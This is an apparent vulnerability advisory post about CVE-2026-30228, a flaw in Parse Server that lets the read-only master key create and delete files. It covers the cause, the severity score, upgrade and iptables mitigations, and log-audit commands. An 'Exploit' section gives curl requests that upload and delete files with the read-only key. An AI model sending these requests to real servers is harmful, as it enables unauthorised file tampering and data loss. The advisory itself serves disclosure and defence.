Parse Server, File Creation/Deletion Bypass, CVE-2026-30228 (Moderate)

Listen to this Post

The vulnerability stems from a logical flaw in how Parse Server handles the readOnlyMasterKey. Designed to provide read-only access to data, this key was inadvertently granted write privileges to the Files API. The core issue lies in the server’s authorization checks for the `POST /files/:filename` and `DELETE /files/:filename` endpoints. These endpoints failed to validate that the requesting key was not the readOnlyMasterKey. An attacker who possesses this key, which is often embedded in client-side applications for read-only operations, can exploit this oversight. By crafting direct HTTP requests to these file endpoints, the attacker can bypass the intended read-only restriction. This allows for the arbitrary creation of files on the server, potentially leading to the upload of malicious scripts, or the deletion of existing user-generated content and assets. The flaw affects all server configurations where the `readOnlyMasterKey` is utilized and the Files API is enabled. Patches have been released that now enforce proper permission checks, ensuring that the master key’s read-only scope is respected across all API handlers, including file operations .

dailycve form:

Platform: Parse Server
Version: <8.6.5, 9.0.0-9.5.0-alpha.3
Vulnerability : Authorization Bypass
Severity: Moderate (CVSS:6.9)
date: 5 Mar 2026

Prediction: Patch already available

What Undercode Say:

Analytics:

This vulnerability (CVE-2026-30228) highlights a critical authorization oversight in Parse Server. The root cause is the failure to validate the `readOnlyMasterKey` against write operations in the Files API handler. The CVSS v4.0 score of 6.9 (AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N) indicates a medium severity with high impact on integrity . The flaw exists in the specific logic path for file routes, separate from standard object access controls. An attacker with knowledge of the key can manipulate the file system directly via HTTP requests.

Exploit:

Exploit Example: Uploading a file using the readOnlyMasterKey
1. Set the target server and key
TARGET_URL="https://your-parse-server.com"
READ_ONLY_KEY="your_read_only_master_key_value"
FILENAME="exploit-test.txt"
2. Create a malicious file content
echo "This file was uploaded using the readOnlyMasterKey" > malicious.txt
3. Send the POST request to create the file
curl -X POST \
"$TARGET_URL/files/$FILENAME" \
-H "X-Parse-Application-Id: YOUR_APP_ID" \
-H "X-Parse-Master-Key: $READ_ONLY_KEY" \
-H "Content-Type: text/plain" \
--data-binary @malicious.txt
Expected behavior before patch: File is created successfully.
After patch: Request is denied with authorization error.
4. Exploit Deletion: Delete the file using the same key
curl -X DELETE \
"$TARGET_URL/files/$FILENAME" \
-H "X-Parse-Application-Id: YOUR_APP_ID" \
-H "X-Parse-Master-Key: $READ_ONLY_KEY"

Protection from this CVE:

Immediate Mitigation Steps
1. Upgrade Parse Server to a patched version
For version 8.x, upgrade to 8.6.5 or later
For version 9.x, upgrade to 9.5.0-alpha.3 or later
Using npm
npm install [email protected]
OR
npm install [email protected]
2. If immediate upgrade is not possible, restrict network access
Block external access to the Files API endpoints (/files/)
Example using iptables
sudo iptables -A INPUT -p tcp --dport 1337 -m string --string "/files/" --algo bm -j DROP
3. Audit server logs for unauthorized file operations
grep -i "POST /files/" /var/log/parse-server.log | grep -i "masterkey"
grep -i "DELETE /files/" /var/log/parse-server.log | grep -i "masterkey"

Impact:

An attacker can bypass the read-only restriction to perform unauthorized file operations. This leads to integrity loss (VI:H) as arbitrary file uploads can introduce malicious content or deface applications. Arbitrary file deletions can cause data loss and service disruption. While confidentiality and availability are not directly scored, deletion of assets can lead to indirect denial of service. The attack complexity is low, requiring only network access and possession of the `readOnlyMasterKey` .

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Previous

Vercel Workflow, Predictable Webhook Tokens, CVE-2026-XXXX (Medium)

Scroll to Top